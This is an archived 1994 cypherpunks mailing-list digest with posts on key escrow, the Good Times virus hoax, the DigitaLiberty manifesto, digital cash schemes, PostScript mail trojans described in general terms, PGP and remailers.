Date: Wed, 7 Dec 94 00:45:32 PST
Subject: Anybody got a procmail recipe?
Message-ID: <199412070850.DAA29419@bb.hks.net>

-----BEGIN PGP SIGNED MESSAGE-----

- -----BEGIN PGP SIGNED MESSAGE-----

Sam Kaplin writes:
> Does anyone have a procmail recipe which will forward all incoming mail
> messages to a shell account to a specific usenet news group?

Couldn't you just use, for example, soc.singles at myriad.pc.cc.cmu.edu as the contents of your .forward file ?

- - -L.
Futplex McCarthy; PGP key by finger or server
"We've got computers, we're tapping phone lines; I know that that ain't allowed" --Talking Heads

- ---
[This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.]

From lmccarth at ducie.cs.umass.edu Wed Dec 7 01:10:11 1994
From: lmccarth at ducie.cs.umass.edu (L. McCarthy)
Date: Wed, 7 Dec 94 01:10:11 PST
Subject: Steven Levy on Fresh Air (NPR)
Message-ID: <199412070915.EAA29607@bb.hks.net>

-----BEGIN PGP SIGNED MESSAGE-----

- -----BEGIN PGP SIGNED MESSAGE-----

Steven Levy discussed key escrow with Terry Gross on NPR's Fresh Air today (the show originates at WHYY-FM in Philadelphia). Unfortunately I only caught the tail end of the interview, as I happened to flip to the local public radio station driving home. He drew the analogy between Clipper/EES and being required to leave a key to the "strong door" of one's house at the local police station. Towards the end he specifically mentioned the cypherpunks as a group working against this sort of encroachment on privacy.

Perhaps someone could fill in more details from the beginning of the conversation ?

- - -L.
Futplex McCarthy; PGP key by finger or server
"We've got computers, we're tapping phone lines; I know that that ain't allowed" --Talking Heads

- ---
[This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.]

From jdwilson at gold.chem.hawaii.edu Wed Dec 7 01:39:12 1994
From: jdwilson at gold.chem.hawaii.edu (NetSurfer)
Date: Wed, 7 Dec 94 01:39:12 PST
Subject: Good times virus thing-a-ma-bobber
In-Reply-To: <941207010448.20216805@SCSUD.CTSTATEU.EDU>
Message-ID:

On Wed, 7 Dec 1994, ADAM GERSTEIN, _THE_ MACGURU wrote:

> Michael K. Sanders is believed to have said:
>
> >Has anyone actually seen this 'Good Times' thing? I highly doubt
> >it. And seriously, an e-mail virus? Get real.
>
>
> Need I remind you of a certain Robert T. Morris? Does the "Internet Worm" mean
> anything to you? Sure, it wasn't actual email, but it did use email and other
> means of transport to cripple the net in a matter of hours.
>
> adam
>
> -=-=-=-
> Adam J.
Gerstein
> MacGuru to the stars

According to CIAC:

From root at phantom.com Wed Dec 7 02:15:18 1994
From: root at phantom.com (Operator)
Date: Wed, 7 Dec 94 02:15:18 PST
Subject: Announcing - The DigitaLiberty Forum
Message-ID: <199412062156.QAA06097@mindvox.phantom.com>

PLEASE RE-DISTRIBUTE THIS AS YOU SEE FIT

Friends of Liberty,

It is becoming increasingly apparent that the arrival of cyberspace is destined to engender a fundamental discontinuity in the course of human relations. This is a source of great optimism and opportunity for those of us who believe in freedom.

Many of you who participate in the lively debates that take place in these forums have seen a number of activist organizations spring up claiming to represent the cause of freedom. And if you are like me you have cheered these groups on only to watch them get bogged down in a quagmire of realpolitics.

It is a sad fact that the beast in Washington has evolved into a self-perpetuating engine expert at co-opting the principles of even the most ardent reformers. Slowly but surely all those who engage the system are ultimately absorbed into the mainstream miasma of majoritarianism. For example, what can be more discouraging than watching an organization that started out as a cyber-civil liberties group shift its focus to creating new forms of government entitlements while endorsing intrusive wiretap legislation because they didn't want to jeopardize their influence and prestige amongst the Washington power elite?

Some of us believe we can seek ultimate redress at the polls. Many pundits have declared our recent national elections a watershed in politics, a turning point that represents the high water mark of big government. Nonsense. The names have changed, the chairs have been rearranged, but the game remains the same. The so-called "choices" we are presented with are false, hardly better than the mock one-party elections held by failed totalitarian regimes.

There must be a better way.
I would like to announce the formation of a new group - DigitaLiberty - that has chosen a different path. We intend to bypass the existing political process. We reject consensus building based on the calculus of compromise. Instead we plan to leave the past behind, much as our pioneering forefathers did when they set out to settle new lands. It is our mission to create the basis for a different kind of society. If you would like to join us I invite you to read the information below.

Yours in freedom,

Bill Frezza
Co-founder, DigitaLiberty
December 5, 1994

--------------------------------------------------------------------------

*** What is DigitaLiberty?

DigitaLiberty is an advocacy group dedicated to the principled defense of freedom in cyberspace. We intend to conduct this defense not by engaging in traditional power politics but by setting an active, persuasive example - creating tangible opportunities for others to join us as we construct new global communities.

We believe deeply in free markets and free minds and are convinced that we can construct a domain in which the uncoerced choices of individuals supplant the social compact politics of the tyranny of the majority.

*** Is DigitaLiberty a political party or a lobbying group?

Neither. DigitaLiberty does not seek to educate or influence politicians in the hope of obtaining legislation favorable to our constituents. We plan to make politicians and legislators irrelevant to the future of network based commerce, education, leisure, and social intercourse.

DigitaLiberty does not seek to persuade a majority of the electorate to adopt views which can then be forced upon the minority. We hope to make majoritarianism irrelevant. We invite only like minded individuals to help us build the future according to our uncompromised shared values.

*** What do you hope to accomplish?

DigitaLiberty is not hopeful that widespread freedom will come to the physical world, at least not in our lifetime.
Too many constituencies depend upon the largess and redistributive power of national governments and therefore oppose freedom and the individual responsibility it entails. But we do believe that liberty can and will prevail in the virtual domains we are building on the net and that national governments will be powerless to stop us. We believe that cyberspace will transcend national borders, national cultures, and national economies. We believe that no one will hold sovereignty over this new realm because coercive force is impotent in cyberspace.

In keeping with the self-organizing nature of on-line societies we believe we will choose to invent new institutions to serve our varied economic and social purposes. DigitaLiberty intends to be in the forefront of the discovery and construction of these institutions.

*** But what about the construction of the "Information Superhighway"?

The fabric of cyberspace is rapidly being built by all manner of entities espousing the full range of political and economic philosophies. While political activity can certainly accelerate or retard the growth of the net in various places and times it cannot stop it nor can it effectively control how the net will be used.

Our focus is not on the institutions that can and will impact the building of the physical "information highway" but on those that will shape life on the net as an ever increasing portion of our productive activities move there.

*** What makes you think cyberspace will be so different?

The United States of America was the only country in history ever to be built upon an idea. Unfortunately, this idea was lost as we slowly traded away our liberties in exchange for the false promise of security.

DigitaLiberty believes that technology can set us free. The economies of the developed world are now making a major transition from an industrial base to an information base.
As they do, the science of cryptology will finally and forever guarantee the unbreachable right of privacy, protecting individuals, groups, and corporations from the prying eyes and grasping hands of sovereigns. We will all be free to conduct our lives, and most importantly our economic relations, as we each see fit.

Cyberspace is also infinitely extensible. There will be no brutal competition for lebensraum. Multiple virtual communities can exist side by side and without destructive conflict, each organized according to the principles of their members. We seek only to build one such community, a community based on individual liberty. Others are free to build communities based on other principles, even diametrically opposed principles. But they must do so without our coerced assistance.

Effective communities will thrive and grow. Dysfunctional communities will wither and die. And for the first time in human history, rapacious societies will no longer have the power to make war on their neighbors nor can bankrupt communities take their neighbors down with them.

*** What does this have to do with my real life? I can't eat data. I don't live in a computer.

Yes, but imagine the ultimate impact of mankind's transition from an agrarian economy to an industrial economy to an information economy. Our founding fathers would have considered anyone insane who predicted that a nation of 250 million could feed itself with fewer than 3% of its citizens involved in agriculture. Similarly, economists and politicians trapped in the policies of the past lament our move from a manufacturing economy to a knowledge worker and service based economy. We see this as a cause to rejoice. The day will come when fewer than 5% of the citizens of a nation of 1 billion will be involved in manufacturing - if we still bother calling geographically defined entities "nations". What will the rest of us be doing?
We will be providing each other with an exploding array of services and we will be creating, consuming, and exchanging information. Most of this will occur entirely within or be mediated at least in part by our activities in cyberspace.

Many of us will earn a very good living on the net. Our race, our religion, our gender, our age, our physical appearance and limitations will all be irrelevant and undetectable. Hard working individuals from underdeveloped nations who in the past might have been forced to emigrate in search of economic freedom and opportunity can now build productive lives in cyberspace. And much if not all of the wealth we create that we do not transform into visible physical assets will be ours to keep and use, beyond the grasp of sovereigns.

*** What is the purpose of this forum?

The DigitaLiberty Forum is a place where like minded individuals can share their views, observations, and strategies related to the development of virtual communities based on freedom. It is a place where people can exchange information and advice about how they have developed extra-territorial business and social relationships - away from the influence and outside the jurisdiction of governments. It is a forum for the posting of essays, questions, and ideas on the topic of liberty. It is a place where we can meet and debate the forms that our new institutions might take and discuss the practical problems and responsibilities that freedom entails.

In time as our technology matures some of us will move on to more ambitious projects, launch other programs, and begin our virtual migration from the swamp of coerced collectivism. Best of all, there will be no need to physically move to 'Galt's Gulch' or escape to a floating 'Freedonia'. We can all participate in this exodus without hastily quitting our jobs or disrupting our lives.
And as a larger and larger portion of our economic and social activities move onto the net we will create a new society, open to all with the will to enter. This new world will be interleaved with the physical world in which we now live and yet will be separate. And free.

Join us as we begin the journey.

*** Who can join DigitaLiberty?

The DigitaLiberty Forum is open to anyone that can honestly answer yes to the following two questions:

1) I renounce the use of coercive force as a tool of social or economic policy.

2) I do not derive the majority of my income from funds taken from taxpayers.

*** How do I join DigitaLiberty?

If you qualify, send a message to DigitaLiberty-request at phantom.com with the words "SUBSCRIBE" in the subject line and the message body as follows

SUBSCRIBE DigitaLiberty

And welcome to the future.

###

From iijon at iiit.swan.ac.uk Wed Dec 7 02:44:42 1994
From: iijon at iiit.swan.ac.uk (Jon Care)
Date: Wed, 7 Dec 94 02:44:42 PST
Subject: Good times virus thing-a-ma-bobber
In-Reply-To: <941207010448.20216805@SCSUD.CTSTATEU.EDU>
Message-ID:

>
> Michael K. Sanders is believed to have said:
>
> >Has anyone actually seen this 'Good Times' thing? I highly doubt
> >it. And seriously, an e-mail virus? Get real.
>
>
> Need I remind you of a certain Robert T. Morris? Does the "Internet Worm" mean
> anything to you? Sure, it wasn't actual email, but it did use email and other
> means of transport to cripple the net in a matter of hours.
>
> adam

Was this a real message, or is someone having us on? I mean, come on, who seriously describes themselves as "MacGuru" AND puts in their anonymous email address as well :)

Not very anonymous now is it?

>
> -=-=-=-
> Adam J.
Gerstein
> MacGuru to the stars
>
> Available at:
> GERSTEIN at SCSU.CTSTATEU.EDU MACGEEK at SCSU.CTSTATEU.EDU
> A GERSTEIN at AOL.COM MACGEEK at eWorld.com
> an41389 at anon.penet.fi (for anonymity)
> -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
>
>

--
Jonathan H. Care, i^2it Ltd. -o- PGP public key available.
Email: iijon at iiit.swan.ac.uk -o- Tel: +44 1792 295213 Fax:+44 1792 295811
http://www.linux.org.uk/Jon.html -o- My opinions are solely my own. Boo!

From lnowlin at igc.apc.org Wed Dec 7 03:03:26 1994
From: lnowlin at igc.apc.org (Lauren Nowlin)
Date: Wed, 7 Dec 94 03:03:26 PST
Subject: WWW> Visa is pleased to announce ou
Message-ID: <199412071103.DAA15934@igc2.igc.apc.org>

/* Written 8:05 PM Dec 5, 1994 by sackman at plains.nodak.edu in igc:comp.internet. */
/* ---------- "WWW> Visa is pleased to announce ou" ---------- */

---------- Forwarded message ----------
Date: Sat, 3 Dec 1994 11:16:57 -0800 (PST)
SENDER: James
Subject: WWW> Visa is pleased to announce our new Home Page

Visa, the largest consumer payment system in the world, is pleased to announce the WWW availability of information about Visa services and products.

With more than 11 million acceptance locations worldwide, member financial institutions have issued more than 357 million cards worldwide. Visa also has the leading global ATM network.

Besides information on products and services, the Visa Home Page currently includes Financial Tips for Consumers, along with information on technological trends in payment systems. Under "Financial Tips for Consumers", Internet/WWW users can download the financial education program "Choices and Decisions: Taking Charge of Your Life".
Features under development include News from Visa, comprised of up-to-date company news releases and a worldwide ATM locator guide.

The Visa Home Page is at URL: http://www.visa.com/visa/

Contact your local Visa member bank regarding services and products available in your specific area.

-----------------------------------------------------------------------
Jim Hunter (Webmaster) jshunter at net.effects.com http://www.net.effects.com

From lmccarth at ducie.cs.umass.edu Wed Dec 7 03:44:18 1994
From: lmccarth at ducie.cs.umass.edu (L. McCarthy)
Date: Wed, 7 Dec 94 03:44:18 PST
Subject: giving one's "anonymous" address
Message-ID: <199412071149.GAA10149@bb.hks.net>

-----BEGIN PGP SIGNED MESSAGE-----

- -----BEGIN PGP SIGNED MESSAGE-----

Adam J. Gerstein writes:
> MacGuru to the stars
>
> Available at:
> GERSTEIN at SCSU.CTSTATEU.EDU MACGEEK at SCSU.CTSTATEU.EDU
> A GERSTEIN at AOL.COM MACGEEK at eWorld.com
> an41389 at anon.penet.fi (for anonymity)

Jon Care writes:
# Was this a real message, or is someone having us on? I mean, come on, who
# seriously describes themselves as "MacGuru"

No comment :>

# AND puts in their anonymous email address as well :)
#
# Not very anonymous now is it?

I think the idea is that email sent to an anXXXXX at anon.penet.fi address will be anonymized by the penet server, so you can establish a conversation channel with MacGuru here without setting up a reply block through some remailers. In some newsgroups where anonymous posting is common, listing of several "anonymous" email addresses in .sigs is also common.

- - -L.
Futplex McCarthy; PGP key by finger or server
"We've got computers, we're tapping phone lines; I know that that ain't allowed" --Talking Heads

- ---
[This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.]

From dmandl at panix.com Wed Dec 7 03:51:21 1994
From: dmandl at panix.com (David Mandl)
Date: Wed, 7 Dec 94 03:51:21 PST
Subject: SWM seeks cryptographer
Message-ID: <199412071151.AA11625@panix.com>

A friend of mine who works for a publisher of kids' books is looking for a real (professional) cryptographer to interview for an upcoming book. I'm not sure of all the details, but I think they want to ask you what crypto is all about, how it works, why it's used, etc. I think he said they'll even include your photo in the book.

Anyway, this is sketchy, but you can get more details by talking to him. He's a good friend and a nice guy (and very sympathetic to the cypherpunk cause). Feel free to contact him directly at:

rusty at panix.com

His name is Rusty. Thanks.

--Dave.
--
Dave Mandl
dmandl at panix.com

From dmandl at bear.com Wed Dec 7 06:32:58 1994
From: dmandl at bear.com (dmandl at bear.com)
Date: Wed, 7 Dec 94 06:32:58 PST
Subject: Announcing - The DigitaLiberty Forum
Message-ID: <9412071430.AA05954@yeti.bsnet>

> From:

You're infringing on hundreds of people's liberty by mailbombing dozens of inappropriate mailing lists with this junk (I got _two_ copies, and I'm only subbed to one of those lists). I might almost be intrigued if there were a shred of a concrete proposal of some kind in here, but of course there isn't: it's just the usual vague Libertarian pipe dreams. But any time I see a manifesto this long-winded, jargon-filled, and devoid of tangible ideas, that's exactly what I expect.

My favorite quote:

> launch other programs, and begin our virtual migration from the
> swamp of coerced collectivism. Best of all, there will be no need to
> physically move to 'Galt's Gulch' or escape to a floating 'Freedonia'. We
> can all participate in this exodus without hastily quitting our jobs or
> disrupting our lives.

Whew, _that's_ a relief! When I achieve complete liberty I certainly don't want it to make me quit me job or disrupt my life in any way!

--Dave.

From rsk at gynko.circ.upenn.edu Wed Dec 7 06:36:19 1994
From: rsk at gynko.circ.upenn.edu (Rich Kulawiec)
Date: Wed, 7 Dec 94 06:36:19 PST
Subject: Announcing - The DigitaLiberty Forum
In-Reply-To: <9412062258.AA23412@dockmaster.phantom.com>
Message-ID: <9412071349.AA17537@hazel.circ.upenn.edu>

>The DigitaLiberty Forum is open to anyone that can honestly answer yes to the
>following two questions:
>
>1) I renounce the use of coercive force as a tool of social or economic
>policy.
>
>2) I do not derive the majority of my income from funds taken from
>taxpayers.

Ah, a litmus test at the door for DigitaLiberty's version of political correctness in order to see if one is worthy to speak (or listen).
So much for all the rhetoric about liberty and freedom: by #2, you've just ruled out everyone who works in any federal, state or local government agency, defense, aerospace and communications contractors, public universities and schools...shall I go on?

Hmmm, and by #1 you've also ruled out anyone who supports their local police department. I presume, then, that you won't be calling them should someone threaten your person or possessions.

Your forum isn't about *our* digital liberty, it's about *your* personal political agenda -- why not come right out and clearly label it as such, rather than disguising it?

---Rsk

From anonymous-remailer at shell.portal.com Wed Dec 7 06:47:34 1994
From: anonymous-remailer at shell.portal.com (anonymous-remailer at shell.portal.com)
Date: Wed, 7 Dec 94 06:47:34 PST
Subject: BACKING E$
Message-ID: <199412071447.GAA06381@jobe.shell.portal.com>

Sun, 4 Dec 1994, Jim McCoy wrote:

MC|IAs far as a real system goes, you will never see one running on a machine
  |in the US in the near future; in addition to the regulatory BS involved in
  |making magic money useful you would run into all kinds of wonderful
  |gambling laws and regulation.

Which is why the digital money with the most chance of succeeding will be cyber-marks, -francs or -pounds, not cyber-dollars. Work with the currency of a country with fewer regulatory agencies. The chances of being allowed to stay in business increase directly as the number of government witchhunters decrease.

Personal note here: in the past, I have been involved in several anti-govt ventures, always with a view to altering the status quo in favor of freedom fighters and kindred spirits. Some are still going strong, others have been victims of harassment and even in some cases raids..

Of the unsuccessful ventures - the ones that were closed down by Big Brother Sam - the true reason has always been that we were too smart and getting away with whatever we were doing at the time.
So instead, govt found some bogus charge to shut us down with. (In one of the cases they bombed us with orchestrated tax audits, one after another. Later, we were hit with Willful Failure to File something new they called an Environmental Impact Report; this was in a case of knocking down a storage shed! If you think this is "BS", get the last case: On TV, we had an associate promise a free bonus gift to the first 100 callers to a promotion. Upon shipping, we decided to give away the free bonus to *all* callers, a few thousand all told. This amounted to felonies of fraud, mail fraud and enough to put our associate away for up to 10.

Of the successful ventures, all have had one thing in common: they have been headquartered abroad. Our people there have had both Scotland Yard and Dutch police look over the operations, always on the request of the Americans. We have even had an Inland Revenue investigation, requested by the IRS. In all cases, the govt went away empty handed and as good friends - agents even apologized for the inconvenience. Their word to their U.S. colleagues: "We will not shut down someone who is not doing anything illegal. We may not agree with their political aims, but this in itself is insufficient basis for prosecution."

ObCrypto: Anarcho-capitalists take note here,

1. In the U.S., the totality of federal regulations now comes to 202 volumes numbering 131,803 pages. "They" can *always* find something in there to shut you down with. Their aim is to seize what you have and put you out of business because you are not giving in to their demands.

2. Abroad, regulations are oftentimes of the common sense variety. If you are a crook, you can and will be shut down. But if - like me - you are honest, hardworking and just happen to not agree with U.S. policies of oppression, then you will be free to run your affairs as you see fit.

3.
If the operator of a successful digital cash currency achieves for his money more than play-money status, he will be intimidated into providing traceability. Sorry: there is no way he can insulate himself even with prior legal briefs and a team of top lawyers. I have been through it personally. We even had a bank in the seventies. If the bureaucrats target you, they *will* get you. Sure, you can fight. You won't win.

Conclusion: I only see 'untouchable' digital cash of having integrity and a decent rate of survival if based abroad. Personal experience tells me that it should be pegged to the pound sterling. A futuristic twist with more widespread appeal to non-Europeans would be to peg it to the ECU although marketing could be tough this side of the common currency (year 2000?). If pegged to the ecu, HQ should still be in London. Have James Capel or some such handle the escrow account to guarantee real-money backing and -conversion. Individual accounts can be located anywhere and should stay out of mainland U.K.

Sorry for the length of this post. Early choices now could mean the difference between future success and the alternative: headaches + the eventual inevitable caving in.

"Capt'n Bob"

Am still looking for a pseudonymous address. Suggestions welcome.

From michael.shiplett at umich.edu Wed Dec 7 08:08:57 1994
From: michael.shiplett at umich.edu (michael shiplett)
Date: Wed, 7 Dec 94 08:08:57 PST
Subject: Book Review pointer...
Message-ID: <199412071608.LAA21462@totalrecall.rs.itd.umich.edu>

sci.crypt contains a book review of _The Hobbyist's Guide to COMINT Collection and Analysis_, written and published by Tom Roach. Sounds like it may be of interest to some folks here.

michael

From hfinney at shell.portal.com Wed Dec 7 08:45:06 1994
From: hfinney at shell.portal.com (Hal)
Date: Wed, 7 Dec 94 08:45:06 PST
Subject: Ideal digital cash system?
In-Reply-To:
Message-ID: <199412071644.IAA19261@jobe.shell.portal.com>

Johnathan Corgan writes:

>The authors consider this the first ideal untraceable electronic cash
>system.

>T. Oamoto and K. Ohta, Universal Electronic Cash
>Advances in Cryptology--CRYPTO '91 Proceedings
>Berlin: Springer-Verlag 1992 pp. 324-337

(This should be Okamoto & Ohta.) This paper is not available electronically as far as I know. The crypto proceedings can be found in good university libraries.

I believe the Okamoto scheme has the problem that payments by a person are all linkable. Basically when you open an account with the bank you get a "license" number B which you keep for all the time (and which the bank doesn't know). But every time you spend you have to send B. So all of the payments from a person will use the same B. True, this doesn't reveal his identity, but it allows a given pseudonym's spending patterns to be recorded and studied, which may be almost as bad. Okamoto forgot unlinkability in his laundry list of ideal cash characteristics.

Hal

From GERSTEIN at SCSUD.CTSTATEU.EDU Wed Dec 7 08:45:51 1994
From: GERSTEIN at SCSUD.CTSTATEU.EDU (Just call me Flame-bait)
Date: Wed, 7 Dec 94 08:45:51 PST
Subject: Good times virus thing-a-ma-bobber
Message-ID: <941207114718.2021812c@SCSUD.CTSTATEU.EDU>

Jon Care (iijon at iiit.swan.ac.uk) is believed to have said:

>Was this a real message, or is someone having us on? I mean, come on, who
>seriously describes themselves as "MacGuru" AND puts in their anonymous
>email address as well :)
>
>Not very anonymous now is it?

I'm sorry, I didn't know that I wasn't allowed to have fun _and_ be on this list. The MacGuru was picked up here on campus, and since I rarely send mail off campus, I usually forget to turn it off.

As far as having the anon address in my sig, L.
McCarthy said:

>I think the idea is that email sent to an anXXXXX at anon.penet.fi address will
>be anonymized by the penet server, so you can establish a conversation
>channel with MacGuru here without setting up a reply block through some
>remailers. In some newsgroups where anonymous posting is common, listing of
>several "anonymous" email addresses in .sigs is also common.

I did this for the exact same reason. If someone wants to mail me anonymously, they have the option to just mail my anon account. What's so wrong with that??

>The message itself reeks of the typical chain letter-- oh please send
>this to absolutely everyone you know with email! It'll help them lots!
>
>Yeah, whatever.

Someone (I'm not sure who) brought up the point that the file could actually be an ANSI bomb. It seems to me that for the IBM and clone users on the 'net, this could be something that they would want to watch out for. Now we all know that it wasn't real (and many of you just "knew" it wasn't), it doesn't matter, does it?

-=-=-=-
Adam J. Gerstein
MacGuru to the stars

Available at:
GERSTEIN at SCSU.CTSTATEU.EDU MACGEEK at SCSU.CTSTATEU.EDU
A GERSTEIN at AOL.COM MACGEEK at eWorld.com
an41389 at anon.penet.fi (for anonymity)
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

From andrew_loewenstern at il.us.swissbank.com Wed Dec 7 08:47:22 1994
From: andrew_loewenstern at il.us.swissbank.com (Andrew Lowenstern)
Date: Wed, 7 Dec 94 08:47:22 PST
Subject: (Fwd) Read this, Virus info!!
Message-ID: <9412071644.AA00278@ch1d157nwk>

Michael K. Sanders writes:
> Has anyone actually seen this 'Good Times' thing? I highly doubt
> it. And seriously, an e-mail virus? Get real.

and Ian Farquhar writes:
> And pigs fly too.

Laugh if you want, but this has been possible for years under NeXTSTEP. With its Display PostScript system and rich text mail reader, it's easy to send a PostScript trojan horse via e-mail.
As soon as the message is read, the Mail app tries to display the text and any images inside, which is probably what it should do. However, because EPS images are really just PostScript code, you can write a PostScript program that does all sorts of nasty things, which includes reading and writing files, stick an EPS header on it, and drop it into a mail message. The recipient's mail reader will cheerfully run the received EPS image through the PS interpreter...

All of the EPS trojan horses I have seen do cute, but harmless, things like melt your screen, make windows fly around, rearrange your dock, or display animation before returning things to normal, but they could just as easily erase your home directory or just about anything else. After this major security hole became public knowledge, NeXT provided for 'secure' postscript contexts (safe-DPS if you will) where some of the nastier postscript operators were disabled.

Anyway, it's more than possible, even when the designers didn't originally bargain for any type of 'enabled mail.' And with the proliferation of Display PostScript based X servers and MIME mail tools, and other more advanced mail systems on other platforms, we will probably see much more of this type of thing.

andrew

From p.v.mcmahon.rea0803 at oasis.icl.co.uk Wed Dec 7 09:49:13 1994
From: p.v.mcmahon.rea0803 at oasis.icl.co.uk (p.v.mcmahon.rea0803 at oasis.icl.co.uk)
Date: Wed, 7 Dec 94 09:49:13 PST
Subject: GUCAPI
Message-ID: <9412071749.AA07438@getafix.oasis.icl.co.uk>

A few comments on GUCAPI postings follow.

1. It has been suggested that GSS-API is appropriate for layering over PGP security functions, but this is incorrect, as GSS-API is inappropriate for store-and-forward applications (and associated security mechanisms), and hence isn't suitable for all applications which have security requirements.

2. The application level interfaces for messaging applications must include object protection semantics.
One proposal being considered for this is available by ftp as draft-ietf-cat-iop-gss-00.txt from ds.internic.net in /internet-drafts. There is a BOF on this today at the IETF which other CP IETF correspondent(s) may want to report on.

3. A distinction can and should be made between the higher level interfaces which combine information protection and authentication, and the lower level interfaces to cryptographic transforms and key exchanges which aren't bundled with any trust model or certification infrastructure.

4. The lower level cryptographic interfaces (CAPIs) are the subject of numerous proposals. A few of these were listed in the note I sent to the list yesterday about the recent NIST meeting. One proposal being developed by major vendors (IBM, HP, Sun etc) and to be trialled in practical implementations is available from X/Open, together with an associated email discussion list. Mail me if you want to be part of the review process, or just track developments in this area. (This is intended to be a net standard and an industry standard :-).

- pvm

From adam at bwh.harvard.edu Wed Dec 7 10:42:14 1994
From: adam at bwh.harvard.edu (Adam Shostack)
Date: Wed, 7 Dec 94 10:42:14 PST
Subject: (Fwd) Read this, Virus info!!
In-Reply-To: <9412071644.AA00278@ch1d157nwk>
Message-ID: <199412071844.NAA00693@hermes.bwh.harvard.edu>

andrew wrote:

| Anyway, it's more than possible, even when the designers didn't originally
| bargain for any type of 'enabled mail.' And with the proliferation of
| Display PostScript based X servers and MIME mail tools, and other more
| advanced mail systems on other platforms, we will probably see much more of
| this type of thing.

safe-tcl is designed to allow for enabled mail without opening up many security holes like this. Unfortunately, few people use safe-tcl.
I suspect that a lot of this is because many of the people who would get lots of benefit from safe tcl's basic functions (like mail sorting) use procmail to do those basic functions.

Adam

--
"It is seldom that liberty of any kind is lost all at once." -Hume

From rfb at lehman.com Wed Dec 7 11:00:20 1994
From: rfb at lehman.com (Rick Busdiecker)
Date: Wed, 7 Dec 94 11:00:20 PST
Subject: fixed code
In-Reply-To: <199412060248.VAA04314@bwh.harvard.edu>
Message-ID: <9412071858.AA15197@cfdevx1.lehman.com>

    From: Adam Shostack
    Date: Mon, 5 Dec 94 21:48:37 EST

    The procmail stuff I sent yesterday was slightly broken. It seems
    that keyservers respond well to 'mget 36E61FB1', but not 'get 36E61FB1'

The form "get 0x36E61FB1" works also.

Rick

From Tony.Gurnick at nzdairy.co.nz Wed Dec 7 11:08:16 1994
From: Tony.Gurnick at nzdairy.co.nz (DNA)
Date: Wed, 7 Dec 94 11:08:16 PST
Subject: PGP 2.6.2
Message-ID: <94120808041708@nzdairy.co.nz>

I'm looking for an ftp site for pgp 2.6.2 or greater
outside of the us. I've tried ftp.dsi.unimi.it but
they only have 2.6.1.

Any IDEA? (joke)

T

From skaplin at skypoint.com Wed Dec 7 11:54:55 1994
From: skaplin at skypoint.com (Samuel Kaplin)
Date: Wed, 7 Dec 94 11:54:55 PST
Subject: Anybody got a procmail recipe?
In-Reply-To: <199412070850.DAA29419@bb.hks.net>
Message-ID:

-----BEGIN PGP SIGNED MESSAGE-----

In article <199412070850.DAA29419 at bb.hks.net>, you wrote:
>
> Couldn't you just use, for example,
> soc.singles at myriad.pc.cc.cmu.edu
> as the contents of your .forward file ?

Well, let's see if this address works. I tried all of the gateways listed in the cyphernomicon and all of my messages to alt.security.keydist at whatever.gateway either bounced or vanished into the vast cyberspace void. I was going to do it the hard way. The problem is I can't throw extra info into the header to route the messages through a remailer. Hmmm...worse comes to worse I probably could make procmail do it...something to ponder.
==============================================================================
"No free man shall ever be de-barred the use of arms. The strongest reason for the people to retain their right to keep and bear arms is as a last resort to protect themselves against tyranny in government." -Thomas Jefferson
==============================================================================
skaplin at skypoint.com                    | "...vidi vici veni" - Overheard
                                          | outside a Roman brothel.
PGP encrypted mail is accepted and        |
preferred.                                | Change is the only constant in the
                                          | Universe..."Four quarters, please."
E-mail key at four11.com for PGP Key or    |
Finger skaplin at mirage.skypoint.com      | Smile!! Big brother is watching.
==============================================================================

This message digitally signed to verify the identity of the writer.

From jltocher at CCGATE.HAC.COM Wed Dec 7 12:08:11 1994
From: jltocher at CCGATE.HAC.COM (jltocher at CCGATE.HAC.COM)
Date: Wed, 7 Dec 94 12:08:11 PST
Subject: 2048 bit key generation with 2.6.2
Message-ID: <9411077868.AA786830835@CCGATE.HAC.COM>

I changed my system date (Ho! Ho! Ho!) in order to test the generation of 2048 bit keys. Key view shows the key as having 2047 bits. Can someone tell me what's goin' on?

Please reply by E-Mail; I'm currently not on the list because of the volume.

Regards,
John
______________________________________________________________________________
John L. Tocher               THE CITY-a bounded infinity. A labyrinth where
JLTocher at CCgate.HAC.com    you are never lost. Your private map where every
PGP Fingerprint:             block bears exactly the same number. Even if you
CE 72 1A 11 07 47 35 35      lose your way, you cannot go wrong. --Kobo Abe
9A C1 DE EA 64 21 BC 94      "The Ruined Map"
==============================================================================
To get my PGP key send mail with subject "Get Key"
==============================================================================

From sq0nk at alt.anonymous.messages Wed Dec 7 12:25:32 1994
From: sq0nk at alt.anonymous.messages (Random Factor)
Date: Wed, 7 Dec 94 12:25:32 PST
Subject: Remailers and "##"
In-Reply-To: <199412052125.QAA08290@cs.oberlin.edu>
Message-ID: <199412071922.AA13633@xtropia>

-----BEGIN PGP SIGNED MESSAGE-----

> Date: Mon, 5 Dec 1994 16:25:23 -0500
> From: Jonathan Rochkind
> Subject: Remailers and "##"
>
> I know there's some kind of a syntax you can use involving "##", with
> some of the remailers, and the remailer will insert a header line
> into the message.

most remailers will not let you set the From: line this way.
could one of the remailer operators tell us why?
it doesn't make sense to me.

randy

From tcmay at netcom.com Wed Dec 7 12:35:40 1994
From: tcmay at netcom.com (Timothy C. May)
Date: Wed, 7 Dec 94 12:35:40 PST
Subject: Warning about a message I may have sent
Message-ID: <199412072035.MAA20871@netcom10.netcom.com>

I may have accidentally sent a message to the list that I was intending to send just to myself, from my offline mailer Eudora (as opposed to elm, which I'm now on).
As usual during any time Netcom is crowded, it is apparently not accepting connections from toad.com, and so I am not seeing traffic sent to the list (No, I don't need any of you to offer to send it to me...it'll arrive when toad retries the connection some hours from now and Netcom deigns to accept it.)

A run-of-the-mill mistaken message would not be an issue, but this is a BIGGIE, a 43K file of a paper I just completed that I was planning to offer as an attachment to a mail message. So, I was testing the whole thing. But I may've typed in the list name instead of mine. Oh well.

If it arrives, it's the text only version of a paper submitted to the "Imagina 95" conference to be held in February in Monte Carlo.

I guess random posts to the list are the Monte Carlo method in action.

--Tim May

--
..........................................................................
Timothy C. May         | Crypto Anarchy: encryption, digital money,
tcmay at netcom.com     | anonymous networks, digital pseudonyms, zero
408-688-5409           | knowledge, reputations, information markets,
